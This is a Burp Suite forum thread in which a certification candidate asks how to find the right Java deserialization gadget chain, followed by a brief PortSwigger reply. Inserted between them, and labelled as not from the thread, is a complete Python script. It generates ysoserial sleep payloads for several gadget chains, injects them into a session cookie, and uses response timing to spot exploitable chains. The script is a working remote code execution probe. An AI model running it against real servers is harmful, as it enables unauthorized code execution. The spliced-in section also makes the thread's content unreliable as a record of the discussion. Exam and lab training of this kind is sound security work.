Burp Suite User Forum


Practice Exam - Java Deserialization Scanner

Nadeau, | Last updated: Feb 28, 2023 02:41PM UTC

Hello everyone, I'm working on the practice exam for the Burp Suite certification. As many of you may know, the last stage involved an insecure Java deserialization. Since there are no contextual clues as to what gadget chain the server might be vulnerable to, the advice I found online was to use the Burp extension "Java Deserialization Scanner". This tool can detect the specific Java deserialization vulnerabilities a server may have and is invaluable for completing this part of the exam.

However, it seems this extension no longer works with Burp. It simply fails to detect any vulnerabilities. An issue was posted on GitHub here: https://github.com/federicodotta/Java-Deserialization-Scanner/issues/31

I have run into the same issue. Even using an older version of Burp and Java, I have no success detecting the vulnerability with the scanner, even though I can exploit it using ysoserial (I am running tests against the "Exploiting Java deserialization with Apache Commons" lab).

Does anyone have any idea how to either:
1. get this thing working
2. an alternative tool to do the job
3. an alternative methodology to identify the correct deserialization vulnerability
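
The following is an added example for the third question in the post above (an alternative methodology); it is not code from the original thread, from PortSwigger, or from the Java Deserialization Scanner project. It reproduces, in a standalone Python script, the timing-oracle approach that scanner-style tools use: confirm that the cookie really carries a Java serialized object (the `AC ED 00 05` stream magic, `rO0AB` once base64-encoded), generate one `sleep` payload per candidate gadget chain with ysoserial, send each one in the cookie, and compare response times against a baseline. The target URL `https://TARGET/my-account`, the cookie name `session`, the jar path `ysoserial-all.jar`, the chain list and the 80% detection threshold are all assumptions for illustration, not facts taken from the lab or the exam; ysoserial itself is invoked as `java -jar <jar> <chain> <command>`, which is its documented command line.

```python
import base64
import binascii
import subprocess
import time
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional
from urllib.parse import quote, unquote

# Every Java serialization stream opens with STREAM_MAGIC (0xACED) and
# STREAM_VERSION (5); base64-encoded this becomes the familiar "rO0AB" prefix.
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"

# Assumed starting list: gadget chain names as shipped with ysoserial. The
# exact set available depends on the ysoserial build you are running.
DEFAULT_CHAINS = [
    "CommonsCollections1", "CommonsCollections2", "CommonsCollections3",
    "CommonsCollections4", "CommonsCollections5", "CommonsCollections6",
    "CommonsCollections7", "CommonsBeanutils1", "Spring1",
]


def decode_cookie_value(value: str) -> Optional[bytes]:
    """URL-decode, then base64-decode; None if the value is not valid base64."""
    try:
        return base64.b64decode(unquote(value), validate=True)
    except (binascii.Error, ValueError):
        return None


def encode_cookie_value(payload: bytes) -> str:
    """Base64 then URL-encode, the inverse of decode_cookie_value."""
    return quote(base64.b64encode(payload).decode("ascii"), safe="")


def is_java_serialized(value: str) -> bool:
    """Step 1: does the cookie carry a raw Java serialized object?"""
    raw = decode_cookie_value(value)
    return raw is not None and raw.startswith(JAVA_SERIAL_MAGIC)


def ysoserial_payload(jar_path: str, chain: str, command: str) -> bytes:
    """Run ysoserial and return the serialized bytes it writes to stdout."""
    result = subprocess.run(["java", "-jar", jar_path, chain, command],
                            capture_output=True, check=True)
    return result.stdout


def make_timed_request(url: str, cookie_name: str, timeout: float) -> Callable[[str], float]:
    """Build a function that sends one GET with the cookie set and returns elapsed seconds."""
    def timed_request(cookie_value: str) -> float:
        req = urllib.request.Request(url, headers={"Cookie": f"{cookie_name}={cookie_value}"})
        start = time.perf_counter()
        try:
            urllib.request.urlopen(req, timeout=timeout).read()
        except urllib.error.HTTPError:
            pass  # a 500 from a failed deserialization still gives a usable timing
        except OSError:
            pass  # timeout or connection error: the elapsed time is still informative
        return time.perf_counter() - start
    return timed_request


def probe_chains(chains: List[str],
                 make_payload: Callable[[str], Optional[bytes]],
                 timed_request: Callable[[str], float]) -> Dict[str, Optional[float]]:
    """Step 2: send one sleep payload per chain and record how long each took.

    A None timing means the payload could not be built (ysoserial exited
    non-zero, java was not found, or make_payload returned None), which is
    common when a chain needs a different JDK than the one on your machine.
    """
    timings: Dict[str, Optional[float]] = {}
    for chain in chains:
        try:
            payload = make_payload(chain)
        except (subprocess.CalledProcessError, OSError):
            payload = None
        timings[chain] = None if payload is None else timed_request(encode_cookie_value(payload))
    return timings


def likely_vulnerable(timings: Dict[str, Optional[float]], baseline: float,
                      delay: float, fraction: float = 0.8) -> List[str]:
    """Step 3: chains whose request ran at least `fraction` of the injected delay longer than baseline."""
    return [chain for chain, t in timings.items()
            if t is not None and t - baseline >= fraction * delay]


if __name__ == "__main__":
    # Placeholder target, cookie name and jar path: adjust to your own setup.
    URL, COOKIE, JAR, DELAY = "https://TARGET/my-account", "session", "ysoserial-all.jar", 10
    request = make_timed_request(URL, COOKIE, timeout=DELAY * 3)
    baseline = request("")  # empty cookie value: ordinary response time
    timings = probe_chains(DEFAULT_CHAINS,
                           lambda chain: ysoserial_payload(JAR, chain, f"sleep {DELAY}"),
                           request)
    for chain in likely_vulnerable(timings, baseline, DELAY):
        print(f"{chain}: {timings[chain]:.1f}s, likely usable")
```

Two caveats a practitioner would want: a timing oracle only tells you that a chain executed a command, so one noisy hit is not proof, and it is worth repeating the request for any chain that triggers. And a None timing is a local problem, not a server result; several ysoserial chains refuse to build on newer JDKs, so the scanner failing to flag anything can simply mean the payloads were never generated.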

Michelle, PortSwigger Agent | Last updated: Mar 01, 2023 02:10PM UTC

Hi,

We don't want to give away too many clues on the practice exam, as we want you to be able to use it as a realistic test before you take the exam. Although you can use additional extensions and tools, some of these may not be essential. We list the essential software on our Exam Hints and Guidance page: https://portswigger.net/web-security/certification/exam-hints-and-guidance
